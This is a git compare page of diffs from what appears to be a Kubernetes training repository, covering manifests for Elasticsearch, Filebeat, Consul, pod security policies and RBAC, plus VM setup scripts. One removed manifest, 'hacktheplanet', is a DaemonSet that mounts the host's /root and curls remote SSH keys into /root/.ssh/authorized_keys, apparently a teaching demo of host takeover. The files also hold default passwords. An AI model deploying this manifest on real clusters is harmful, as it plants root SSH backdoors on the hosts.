Compare commits
12 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
91ba273488 | ||
|
|
2aba4eb6c4 | ||
|
|
2dc4b333a9 | ||
|
|
bacfba01b0 | ||
|
|
a384cc0602 | ||
|
|
9697412346 | ||
|
|
1d31573b38 | ||
|
|
6be1b1c2d7 | ||
|
|
9ab4292a8a | ||
|
|
a3ef8efaf5 | ||
|
|
4c5da9ed0d | ||
|
|
6b9b83a7ae |
@@ -1,21 +0,0 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
@@ -1,94 +0,0 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
@@ -1,167 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,34 +0,0 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -1,110 +0,0 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1beta2
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@@ -1,95 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
@@ -1,39 +0,0 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
@@ -1,33 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
@@ -1,70 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -229,7 +229,7 @@ EOF"
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
@@ -248,14 +248,6 @@ EOF"
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -318,14 +310,6 @@ _cmd_listall() {
|
||||
done
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
_cmd_netfix () {
|
||||
TAG=$1
|
||||
@@ -399,15 +383,6 @@ _cmd_retag() {
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
@@ -506,12 +481,12 @@ _cmd_helmprom() {
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
|
||||
@@ -31,7 +31,6 @@ infra_start() {
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
@@ -39,11 +38,10 @@ infra_start() {
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
@@ -99,7 +97,7 @@ infra_disableaddrchecks() {
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=100
|
||||
max_retry=50
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python3
|
||||
#!/usr/bin/env python
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 1
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
29
prepare-vms/settings/enix.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.18.0
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 4
|
||||
clusterprefix: node
|
||||
|
||||
